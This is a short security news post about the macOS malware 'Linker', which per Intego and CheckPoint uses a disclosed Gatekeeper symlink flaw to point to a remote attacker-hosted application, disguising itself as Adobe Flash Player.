Discovered by Intego, Linker is the first malware to exploit a vulnerability in macOS GateKeeper (which is already [disclosed] ({:target=”_blank”})., that enabled adding a symbolic link to remote application located on attacker machine within a legitimate application, and by that bypass the scan of Gatekeeper and XProtect. A video demostrating the attack is [available] ({:target=”_blank”}.

An attacker could add a symbolic link either to a zip file or .dmg file (Apple Disk Image Format). Intego point that one of the samples was signed with the same Apple Developer ID (“Mastura Fenny”) as the OSX/Surfbuyer adware.

On installation the malware will show itself as Adobe Flash Player, a common thing among macOS malwares.

Source: CheckPoint

Althou the remote application was already removed, a research name Adam Thomas has found a PCAP on VirusTotal which contains the remote application that was downloaded when the original application was installed, which at that time was only a bash script that created a temporary file, But since its located on a remote machine it could change any second for testing and place back a malicioius application.

Source: Intego